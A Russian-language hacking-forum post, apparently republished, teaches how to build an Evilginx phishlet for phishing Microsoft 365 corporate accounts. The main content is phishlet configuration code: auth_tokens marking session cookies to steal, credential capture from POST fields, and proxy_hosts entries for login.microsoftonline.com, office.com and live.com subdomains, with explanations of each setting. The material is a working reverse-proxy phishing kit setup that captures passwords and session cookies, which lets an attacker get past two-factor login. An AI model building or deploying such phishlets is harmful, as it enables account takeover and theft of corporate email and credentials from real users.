• Что бы вступить в ряды "Принятый кодер" Вам нужно:
    Написать 10 полезных сообщений или тем и Получить 10 симпатий.
    Для того кто не хочет терять время,может пожертвовать средства для поддержки сервеса, и вступить в ряды VIP на месяц, дополнительная информация в лс.

• Пользаватели которые будут спамить, уходят в бан без предупреждения. Спам сообщения определяется администрацией и модератором.

• Гость, Что бы Вы хотели увидеть на нашем Форуме? Изложить свои идеи и пожелания по улучшению форума Вы можете поделиться с нами здесь. ----> Перейдите сюда
  • Все пользователи не прошедшие проверку электронной почты будут заблокированы. Все вопросы с разблокировкой обращайтесь по адресу электронной почте : info@guardianelinks.com . Не пришло сообщение о проверке или о сбросе также сообщите нам.

Готовим фишлет. Как научить Evilginx работать с Microsoft 365 и Google

Sascha Оффлайн

Sascha

Заместитель Администратора
Команда форума
Администратор
Баллы
155

Когда мне в ходе рабочего проекта понадобилось фишить корпоративные почты, я столкнулся с отсутствием руководства по созданию фишлета для Evilginx, а готовые как раз перестали работать из‑за изменений на сайте. Я решил, что это отличная возможность научиться разрабатывать свой фишлет. Нашей целью будет Microsoft 365.

Для создания фишлета нам понадобятся только две вещи:

• браузер (мой выбор пал на Firefox) или утилита, которая способна логировать запросы и ответы из браузера (Burp Suite);
  • текстовый редактор для написания кода.

Все фишлеты Evilginx хранятся в директории утилиты, в папке phishlets. Если они в твоей версии где‑то в другом месте, то просто запусти Evilginx и принудительно укажи ему директорию с фишлетами: -p /phishlets_folder.

Прежде чем создавать свой фишлет, я бы хотел разобрать его структуру и подробнее рассказать про каждую из частей. Для начала посмотрим на дефолтный фишлет, который лежит в директории phishlets утилиты Evilginx на GitHub. На его основе мы разберем, за что отвечает каждая из частей фишлета, а более детальный анализ проведем на основе фишлета для сайта login.microsoftonline.com.

# Версия

min_ver: '3.0.0'

# Раздел, указывающий на субдомены, которые будут проксироваться

proxy_hosts:

- {phish_sub: 'academy', orig_sub: 'academy', domain: 'breakdev.org', session: true, is_landing: true, auto_filter: true}

# Раздел с правилами, которые позволят избежать нежелательных редиректов или изменить содержимое фишингового сайта, как тебе надо

sub_filters:

- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}

# Раздел, указывающий, какие куки будут «сворованы»

auth_tokens:

- domain: '.academy.breakdev.org'

keys: ['cookie_name']

# Раздел, указывающий, какие данные будут получены из запросов

credentials:

username:

key: 'email'

search: '(.*)'

type: 'post'

password:

key: 'password'

search: '(.*)'

type: 'post'

# Легитимная страница авторизации на сайте

login:

domain: 'academy.breakdev.org'

path: '/evilginx-mastery'

В дефолтном фишлете не указаны такие разделы, как auth_urls и js_inject, но их мы пока отложим. В начале описания каждого модуля фишлета я для наглядности буду вставлять кусок кода, а дальше в ходе повествования показывать скриншоты. Ну что, начнем?

min_ver

Это первая часть фишлета, с которой ты будешь сталкиваться каждый раз. Эта строка отвечает за то, с какой именно версии утилиты будет работать фишлет (я предпочитаю указывать 3.0.0, однако видел, что, некоторые создатели фишлетов указывают 2.3.0).

proxy_hosts

В этом разделе описаны все поддомены и домены, которые будет обрабатывать Evilginx. Их трафик будет проксироваться через нашу утилиту. Это важный раздел: если не включить в список ни один сайт, то чейн нарушится и во время выполнения цепочки запросов случится переход на легитимный сайт.

Пример кода proxy_hosts:

proxy_hosts:

- { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }

- { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }

- { phish_sub: "login1", orig_sub: "login", domain: "live.com", session: true, is_landing: false, auto_filter: false }

- { phish_sub: "account", orig_sub: "account", domain: "live.com", session: true, is_landing: false, auto_filter: false }

- { phish_sub: "outlook", orig_sub: "outlook", domain: "live.com", session: true, is_landing: false }

- {phish_sub: '', orig_sub: '', domain: 'office.com', session: true, is_landing: false, auto_filter: true}

Ты, возможно, спросишь, что значат параметры session, is_landing и auto_filter. Что ж, непонимание в работе с Evilginx иногда губительно, так что расскажу!

Если для session задано значение true, то хосты, обрабатывающие HTML-контент основного сайта, гарантированно возвращают ответы с сессионными куками, учетными данными или любой другой важной информацией, которую нужно сохранить.

Источник:

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.

Вверх Снизу